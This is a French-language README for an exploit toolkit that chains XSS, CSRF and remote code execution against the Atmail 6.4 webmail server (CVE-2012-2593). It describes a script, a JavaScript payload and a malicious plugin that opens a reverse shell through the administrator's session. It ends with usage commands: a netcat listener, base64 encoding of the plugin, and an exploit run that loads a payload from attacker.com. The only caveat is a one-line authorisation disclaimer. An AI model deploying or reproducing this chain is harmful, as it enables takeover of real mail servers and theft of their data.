
Chaîne d'exploitation XSS-CSRF-RCE pour Atmail
atmail-rce.py : Exploite CVE-2012-2593 dans l'interface webmail d'Atmail.
atmail-csrf.js : Fichier Javascript qui exploite CVE 2012-2593 en une CSRF pour installer un plugin malveillant qui exécute un shell inversé.
Plugin.php : Plugin Atmail à installer qui appelle un shell inversé.
!! Utilisez uniquement sur des serveurs pour lesquels vous avez l'autorisation de tester
Le serveur de messagerie Atmail version 6.4 présente une vulnérabilité XSS à la fois dans l'en-tête Date du courrier électronique et dans le Corps du message (via l'injection d'iFrame). Cela est exploité en une CSRF en utilisant l'API XHR Javascript pour envoyer une requête avec le cookie de l'utilisateur administrateur au panneau d'administration, installant un plugin malveillant qui exécute du code pour un shell inversé.
nc -lvp 4444gzip -c Plugin.php | base64 | tr -d [:space:]python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/